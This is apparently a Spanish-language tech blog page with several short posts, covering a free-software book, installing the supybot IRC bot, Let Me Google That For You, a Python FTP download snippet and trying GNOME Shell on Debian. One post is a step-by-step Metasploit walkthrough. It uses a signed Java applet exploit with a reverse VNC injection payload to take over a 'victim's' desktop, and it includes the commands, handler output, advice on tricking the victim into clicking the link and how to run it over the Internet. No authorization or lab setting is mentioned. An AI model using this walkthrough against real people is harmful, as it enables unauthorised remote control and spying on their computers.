Rincón Informático

Hace poco tiempo encontre un articulo realizado por 3 personas Mexicanas,  donde explican de forma muy amplia  las ventajas y desventajas del software libre y el software privativo. para llegar hasta ese punto, los individuos realizaron una profunda investigacion desde los origenes de cada tipo de software, su evolucion y  sus carateristicas, igualmente se consulto con personas expertas tanto en el software libre y sofware privativo, con el fin de reunir todo el conocimiento necesario de ambos movimientos,  y tener las bases suficientes para dar con certeza las ventajas y desventajas de cada uno y las diferencias de ambos.

Para todos aquellos que deseen conocer los origenes del software libre, sus ventajas, sus desventajas y sus diferencias con el software privativo les recomiendo este libro, para que  adquieran los fundamentos necesarios, y puedan decir con seguridad por que el Software libre es  mucho mas, que el software privativo.

Link de descarga

Te gusto la entrada... Compartela

• 

Hace pocos dias me puse a la tarea de registrar el canal IRC de la comunidad DragonJAR en freenode, ya que anteriormente  se encontraba en otro servidor el cual solia tener algunos inconvenientes de conectividad. Aprovecho la ocasion para invitarlos a  que ingresen al canal IRC de DragonJAR, para conversar un rato, los datos son los siguientes:

canal: #DragonJAR.org
servidor: irc.freenode.net

Ahore continuemos  con el tema central de esta entrada, al registrar el canal me dio curiosidad y quise hacer algo que desde hace mucho tiempo habia querido hacer y probar: Crear un bot IRC, antes que nada definamos que es un bot irc:

Un bot (abrevitatura de robot) es un programa informático que realiza funciones muy diversas, imitando el comportamiento de un humano. En sitios wiki, como Wikipedia, un bot puede realizar funciones rutinarias de edición. En otros sitios, como Encarta, el bot puede responder a cuestiones sobre el propio contenido del sitio (tcc bots conversacionales).En sitios de chat en línea (IRC o MSN), algunos bots fueron utilizados para simular una persona, intentando hacer creer al “ciberinterlocutor” que chateaban con una persona real.

Me puse a la tarea de buscar(aunque uno mismo puede crear su bot personalizado) un bot, adecuado, sencillo y potente,  y me encontre con supybot,  un bot desarrollado en Python el cual tiene muchas funcionalidades y herramientas, a continuacion voy a dar los pasos que se deben realizar para instalar dicho bot:

1. Descargamos el bot desde este enlace. y lo descomprimimos
2. Lo instalamos de la misma forma que instalamos cualquier modulo en python

python setup.py install

3. Ahora  nos vamos a la carpeta scripts y ejecutamos  un asistente el cual nos guiara creando el archivo de configuracion.

cd  scripts
python supybot-wizard

4. Este asistente nos empezara a pregutnar algunas cosas necesarias para configurar nuestro BOT, debemos responder cada una de ellas segun nuestras necesidades. Estas preguntas son:

1. quieres ver las preguntas en negrita?  -> Responder Y
2. eres usuario avanzado? -> Por defecto responder N (aunque si quieres puedes ensayar)
3. donde se encuentra los archivos del bot? -> responder por default .
4. cual es la red de IRC? -> la red de IRC en mi caso freenode
5. servidor?  -> la direccion del servidor: irc.freenode.net
6. requiere de otro puerto no standar? -> Si lo ves necesario
7. nick del bot? -> Cual sera el nombre del bot
8. password del nick?  si el nick esta registrado necesita password
9. canales a conectar?  respondemos Y y en mi caso seria #DragonJAR.org
10. cargar los plugin idividualmente?  -> NO
11. owner? Este es el nick quien controlara al bot
12. caracteres que usara para las ordenes del bot? Y Puede ser @ o | o ! como guste

5. Lanzamos el bot con el archivo de configuracion que se creo en el paso anterior, generalmente el archivo de configuracion tiene el nombre del archivo con extension .conf:

supybot nombre.conf

6. Si todo ha salido bien, ya tendremos nuestro bot en el canal de IRC, ahora es necesario entablar una conexion con el bot e identificarnos para poder lanzarle comandos:

/query nombre
identify nick-quien-controlara-elbot password

7. Listo ya podremos mandarle muchos comandos a nuestro bot, si quieren ensayar pueden mandarle un ping, y el respondera un pong, este bot tiene muchas funcionalidades, como diccionario, rss,  traductor, mensajes personalizados, y muchos mas… para eso es bueno que lean el manual de cada script y vean como funciona cada uno.

Te gusto la entrada... Compartela

• 

A muchos informaticos nos suele pasar que nuestos amigos e incluso desconocidos nos lanzen preguntas o muy obvias o muy fuera del campo, es comun que nos pregunten cosas como:

• ¿Como se hackea hotmail?
• ¿ Como borro un virus de mi computadora?
• ¿Por que me aparece una pantalla azul?
• ¿Usted sabe formatear?
• ¿Como se instala un programa?
• Y la lista continua…

Cuando nos hacen este tipo de preguntas  muchos de nosotros pensamos ¿Por que no le preguntan al todo poderoso Google? ¿Pereza? ¿Desconocimiento?. Sabiendo que el tiene la respuesta a  cualquier tipo de preguntas, desde las mas especificas hasta las mas curiosas y raras.

Para solucionar estos inconvenientes y estas molestas preguntas, existe una web llamada Let Me Google that for you que traduce: Deja que te busque eso en Google, la misma pagina se define como:

Esto es para todas las personas que piensan que es mejor molestarte a ti antes que buscar en Google.

Su funcionamiento es muy sencillo, ingresas a la web, y escribes la pregunta que te hayan realizado, y el te genera un link el cual es el que le debes de mandar a la persona quien te hizo la pregunta, y eso es todo cuando la persona haga click en link aparecera google con los resultados  de la pregunta, es decir, como si hubiera preguntado directamente a google.

Te gusto la entrada... Compartela

• 

Siguiendo con las entradas relacionadas con el gran lenguaje programacion llamado PYTHON , hoy quiero mostrar como con un sencillo y corto codigo de PYTHON podemos  descargar un archivo desde cualquier servidor FTP al cual tengamos acceso.  A continuacion un ejemplo.

#!/usr/bin/python
from ftplib import FTP
ftp = FTP(‘ip_servidor”);
ftp.login(user=’usuario, passwd=’password’)
ftp.cwd(“carpeta_donde_esta_el_archivo”);
ftp.retrbinary(‘RETR archivo.txt’,open(‘archiv.txt’,'wb’).write)
ftp.quit()

Como pueden ver es bastante sencillo, peor muy util cuando necesitamos descargar algun tipo de archivo o informacion, en el momento en que trabajamos con Python

Te gusto la entrada... Compartela

• 

En esta ocasion, se mostrara como de manera facil  y usando el Metasploit Framework  inyectaremos un servidor VNC en una maquina remota para poder visualizar el escritorio de la victima y hacer lo que deseemos.

Antes de entrar en materia debemos tener en cuenta que  el exito del exploit depende de varios factores  entre ellos tenemos:

• Antivirus de la maquina victima -> He hecho algunas pruebas y  el NOD32 detecta  el archivo como un troyano.
• JAVA -> Es necesario que la victima tenga instalado JAVA instalado
• Que la victima acepte el certificado.
• Un poco de suerte.

Para empezar debemos actualizar nuestro Metasploit:

msfupdate

El siguiente paso es correr la consola del metasploit:

msfconsole

Ahora seleccionamos el exploit  y asignamos los parametros necesarios:

use exploit/multi/browser/java_signed_applet
set payload windows/vncinject/reverse_tcp
set lhost 192.168.100.1 -> Ip local
lhost => 192.168.1.100
exploit

A continuacion debe salir algo como esto:

[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.2:4444
[*] Using URL: http://0.0.0.0:8080/dTkaem
[*]  Local IP: http://192.168.1.100:8080/dTkaem
[*] Server started.

El siguiente paso es hacer que nuestra victima haga click en el enlace malioso que el exploit a creado:

http://192.168.1.100:8080/dTkaem

Hay que tener en cuenta que esta es una direccion privada y que asi solo funcionara si nuestra victima esta en la misma red LAN. Si se desea hacer a traves de Internet se debe cambiar el enlace por la IP publica y asegurarse que  no haya algun dispositivo como router, firewall o demas que impidan el paso hacia el puerto 8080
Cuando la Victima haga click en el  enlace aparecera una advertencia como esta:

Si nuestra victima ejecuta la aplicacion, inmediatamente se nos abrira la pantalla del escritorio remoto donde podremos  ver lo que hace la victima en ese momento,   y hacer lo que nosotros queramos.

Te gusto la entrada... Compartela

• 

Cada vez esta mas cerca el lanzamiento de Gnome-3, una version que muy posiblemente causara una muy buena impresion y dara mucho de que hablar, asi como lo hizo KDE en su momento con KDE4.

Sin embargo ya se encuentra en los repositorios de la version testing de Debian (squeeze), algunas aplicaciones de esta nueva version las cuales nos pueden dar una idea  de  lo agradable y funcional que sera GNOME-3. Una de estas aplicaciones es GNOME-SHELL, segun el propio proyecto GNOME, GNOME-SHELL es:

GNOME Shell es la tecnología que define la experiencia de usuario GNOME 3 de escritorio. Proporciona las funciones básicas de la interfaz como el cambio de ventanas y el lanzamiento de aplicaciones. GNOME Shell se aprovecha de las capacidades del hardware de gráficos modernos e introduce conceptos innovadores de interfaz de usuario para proporcionar un agradable y fácil de usar la experiencia.

Para instalarlo debemos hacerlo desde los repositorios:

apt-get install gnome-shell

Ahora que ya lo tenemos instalado lo ejecutamos de esta forma, en una consola como un usuario normal escribimos:

gnome-shell –replace

y listo tendremos a gnome-shell funcionando, algunos pantallazos.

Para volver al antiguo gnome solo basta con  presionar alt +f2 y escribir lo siguiente:

debugexit

Si por alguna razon las ventanas se quedan sin barras debemos poner en una consola:

metacity –replace

y nuevamente tendremos nuestro escritorio como antes.

Para todas aquellas personas que estan esperando con ansias  el lanzamiento de GNOME-3 esta es una buena alternativa, ir mirando poco a poco las nuevas aplicaciones de esta nueva version.

Te gusto la entrada... Compartela

•